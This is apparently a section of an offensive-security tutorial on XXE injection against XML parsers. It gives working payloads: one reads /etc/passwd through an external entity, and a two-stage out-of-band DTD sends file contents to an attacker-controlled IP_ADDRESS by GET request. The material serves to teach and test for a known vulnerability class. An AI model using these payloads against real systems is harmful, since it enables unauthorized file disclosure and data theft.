This section covers pwning XML parsers with XML external entities (XXE) injection attacks. We can use XXE injection attacks to uncover information disclosure, server-side request forgery (SSRF), remote command injection, and remote code execution vulnerabilities in web applications.

Testing for XXE

Here’s an example for testing for XXE in an XML parser for a web application. If we’re providing the following input to a web application, and the internal entity lastname is used to render the output for the User element, we know we can inject XML entities for the application to process:

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname "Hacker">
]>
<User>
  <lastName>&lastname;</lastName>
  <firstName>Victim</firstName>
</User>

Retrieving files

After verifying the vulnerability, we can use it to conduct information disclosure, targeting content on the host’s file system:

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<User>
  <lastName>&lastname;</lastName>
  <firstName>Victim</firstName>
</User>

We determine where this content is rendered, and then we can retrieve the contents of the file from the web application.

Error-based exploitation

If the information we’re targeting isn’t rendered by the web application in a way we can access after exploitation, we can use error-based exploitation to possibly disclose the information we’re targeting. For example, lastname might have a maximum character length for the web application’s database used to store Users. If we request a file on the host system with a size that exceed this limit, it’s likely the web application will provide us with an error, leaking the contents of the file we’re targeting.

Out-of-band exploitation

We can also conduct SSRF, coercing the victim machine to attempt to load external resources from our server, disclosing information when the victim executes a GET request. Here’s an example of a payload that causes the victim to request our XML file and parse it, causing the victim to request a second stage payload that discloses the information we’re targeting via a GET request.

First stage payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://IP_ADDRESS/second-stage-payload.dtd">
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>

Second stage payload:

<!ENTITY % content SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY &#37; exfil SYSTEM 'http://IP_ADDRESS/out?%content;'>" >

The first payload will request the second stage payload, which will attempt to acquire the contents of the /etc/passwd file. Then the second stage payload will attempt to acquire a resource from our web server, and we render the content of the file in the URL the victim is requesting. This SSRF attack leaks the contents of the file when the GET request reaches our web server.

Due to how URLs are parsed, it’s likely a portion of this request will fail. Unfortunately out-of-band exploitation for XXE vulnerabilities is a last resort, and not always the most effective approach.